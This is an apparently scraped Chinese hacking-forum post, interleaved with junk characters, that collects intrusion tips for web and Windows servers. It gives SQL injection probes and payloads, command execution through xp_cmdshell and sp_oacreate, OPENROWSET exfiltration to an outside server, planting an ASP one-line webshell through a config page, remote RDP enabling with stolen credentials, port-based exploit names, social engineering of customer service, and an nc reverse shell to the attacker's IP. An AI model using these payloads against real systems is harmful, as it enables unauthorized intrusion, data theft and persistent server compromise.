SA点数据库分离技术相关
! j2 C: A5 H2 N3 F( h! x/ x N/ N% d% o$ t9 G& q
+ l( P6 w+ q' h0 x5 s! t1 B$ A5 z
SA点数据库分离搞法+语句:4 U3 m; ?& ~2 b) T
/ v) ?' J. }$ a注射点不显错,执行下面三条语句页面都返回正常。! n) [- ^! ~4 R( ~
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
% p4 l. k2 m$ _, {and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')5 ~- ?% V T8 I$ u( Y
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
' E9 D4 ^" m) b可以列目录,判断系统为2000,web与数据库分离
1 t, |# r8 L; L0 N- E% Z' Z1 I8 e遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。8 j; J6 H' ~" ]9 N: S8 a! m, s
在注射点上执行
& K& O. F7 E S0 i" ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
* a2 u4 N# F9 R- s页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP8 }+ C% @4 Y! j! j a
还有我用NC监听得其他端口都没有得到IP。
# n* z% p8 q' Q. K& a8 P* B" a, C3 ]: U0 W
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。% l+ h+ [/ I8 w$ n" R
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--6 D6 k9 d, W0 s1 `3 @( ^
3 L) @4 `( M( R1 [& [4 ^, K" J;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--+ H0 M/ s, ~- u4 v6 d/ D' K
9 N, @( z; W, j0 O, p y2 X3 G2 I现在就猜想是不是数据库是内网而且不能连外网。
+ |5 L/ ~3 C: t& ^
) O& x# M2 X- f$ V7 b4 K5 Q- h/ _0 n, i7 A+ m7 W F
access导出txt文本代码
0 j. n8 Y# N" I+ G( ^! ASELECT * into [test.txt] in 'd:\web\' 'text;' from admin7 f: e8 g! z8 s! X4 a
8 w3 t( ?( M) M$ N! c- z- C3 {. K( z8 M) W2 e5 o# V
/ {: r1 P) }: z2 _) z
自动跳转到指定网站代码头
& t$ i, Y' D) N+ D5 z P A( V' K<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>9 C% ?& u$ W( m
( f1 M6 ^6 O" h( F: Y2 C' Y/ @4 @; w* i U; i) M* }
入侵java or jsp站点时默认配置文件路径:; m5 F! j3 {4 s' I K& A, ~$ D9 q6 t
\web-inf\web.xml& n, d( I) X2 t& Y- l% k
tomcat下的配置文件位置:- v+ R: `/ S3 I2 p8 x6 C" ]) [
\conf\server.xml (前面加上tomcat路径)( {7 ?; r v! |3 i4 @8 `9 y
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml. Y1 b+ C! l6 n6 S+ N* y7 G
+ G5 U5 E1 W* z4 k
1 ], r* s$ }- E/ q" T9 c7 @
3 b5 f0 c J$ s, Z
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
9 s) |8 o9 l8 D. G-1%23! K+ c% k+ H' n
>
0 H' Q/ A# y9 t, r<; x% b4 S4 X" e! ^/ n, F0 {
1'+or+'1'='1+ A, W: ]- [+ _/ a1 ]
id=8%bf
0 r- b, J& P- ~
( U7 b) f' R$ }; O7 w5 X7 j全新注入点检测试法:( | X% }' U; u! [5 v8 ~5 U
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。6 p d+ ^, j: r, W! L
0 D0 h i& I8 E/ q
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。# ^) n8 A; T5 Y9 X
: P' C$ [" p7 U* w搜索型注入判断方法:
, }4 T" H H$ `$ g7 z E北京%' and '1'='1' and '%'='
3 ?6 g7 S/ ~% z0 n6 F6 Y9 q北京%' and '1'='2' and '%'='- Y" R, m. ~5 M: Z. T( z
' ^& F5 {- o) O5 y7 b
9 B0 N- N9 A9 E1 a! eCOOKIES注入:1 K1 B d2 Z" O0 P4 e
/ m& H/ ^) z/ E/ h6 v2 C' Fjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
' [- d: C! _' _( @' p+ N0 D: J! \9 J8 o5 \' t0 `# g# _0 U0 _
2000专业版查看本地登录用户命令:2 U5 {; ]2 Q% G# ]) ?& n
net config workstation
& A0 R2 E( U8 [2 o! a- o- W+ s
, j% I8 c9 o7 ?, a. X+ K3 s
% E* o+ \$ a. o' D& D9 ?+ r2003下查看ipsec配置和默认防火墙配置命令:: i& G$ h# L- K( n
netsh firewall show config" U8 a/ `; h R4 r4 }
netsh ipsec static show all6 e- j0 V/ T, H' x
- j0 }8 J' [' Q4 w
不指派指定策略命令:: G0 E0 u' f3 ~# ]4 C" [. ~ |
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
* Q, j/ q0 T* R0 Z6 h6 a: cnetsh ipsec static show policy all 显示策略名5 O7 o- L" e9 W7 }
1 C8 t8 N$ P v, t* i
$ N" F' O' [. J2 m! [# p5 F9 V _猜管理员后台小技巧:9 C1 ^* F ^# J) W$ e1 V" `
admin/left.asp
9 H- K2 _ X& C! `7 q! hadmin/main.asp
* W+ Y/ Z8 z2 `6 `admin/top.asp q3 w- J( U% b
admin/admin.asp + l5 g7 I8 l. _& Q
会现出菜单导航,然后迅雷下载全部链接
! `1 y9 P E j( U2 D+ o+ Q4 p
3 g; {$ Q. G8 ~% X5 h/ `1 W4 z1 h
/ _5 Y( y7 N) w. J: M! B社会工程学:9 G0 {6 K: O1 J% l
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人: A7 j. U% P6 M: u
然后去骗客服
! B2 {2 r& q+ ~3 o. l
6 T0 i! {7 E. ]0 j; Q/ P% Y- u( h" {9 S1 O5 b; b8 Z( q
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 6 ]& \( |- c& ?2 V
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
" d) S# ~6 a$ c1 o$ |4 z2 m 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
j, A- ?* L& `/ \
. c$ L; v( o; N9 s5 Y& z
1 w/ L+ P( F, \" |! U: y3 V: L! ?; l' R0 b$ d$ @
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
; [4 o; ^ i6 v$ n+ X
* y6 a2 f$ e H: R& c, H& x- l+ ~1 x7 I9 k! o1 S
4 f. c& f: M2 V* c- i( q
CMD加密注册表位置
) t) c7 }6 g. B z9 T- v @(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor: }4 K8 ~' t; l! Z7 o: R0 U4 M* B
AutoRun, k, J) S: S* Q" W7 y! u+ m
: N! x7 l% |9 h3 ]6 K& \$ i
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor s3 |5 O+ S2 K* g& ?) `0 @
AutoRun
) ]$ W. A U7 \" G W3 X4 `9 s8 T5 \4 s
3 I: z3 U+ D% b/ D6 V
在找注入时搜索Hidden,把他改成test) [! k& M5 a J, K. h3 f7 ~2 k
$ m( S$ {, N: K6 q* p* ~
, Y" T( Z7 r* o% @0 \
% J1 C4 ~' w+ u# E! j$ J7 Amstsc /v:IP /console 0 D/ q/ f' O+ E7 {8 L0 D
2 \0 h, i+ \: o( R
3 F- e! S5 f; s& x7 H) e& M一句话开3389:# g0 J" N. O# B+ G/ o' q) T
8 }9 X/ m3 K$ y3 V3 b5 A最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 5 N0 S7 m: o2 m' m
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.8 e A' O* }1 P+ U& p( y" e
3 N2 e1 Q0 [( {# @; p n+ y
) H! e0 F% s0 ]2 H9 g8 J8 x: o知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:& [: F2 s2 E. v- c* [
Insert into admin(user,pwd) values('test','test')
3 m9 H& d; m5 g
5 V: w! h/ J( m3 y+ m+ F
! {8 O' W3 d# d& l( oNC反弹
7 Y, U' L- K5 [% n; `1 b, J先在本机执行: nc -vv -lp 监听的端口 (自己执行)
/ j, N4 r8 O) a7 e( C7 Y然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
3 ?. z% z z% P$ t( P3 e/ D. ^( Y- |- I+ P# O% |0 K. D
! Y1 M& v" L& p9 @
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题* ?( ~) E& \$ y' l5 K. p1 V
* s* i( o2 j) o6 _4 r3 S有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录9 d' ~0 _% Q# _7 R2 K7 g
例如:
( ~1 s ?, I2 U) o- H4 Csubst k: d:\www\ 用d盘www目录替代k盘
9 Z- _9 k- _6 }subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对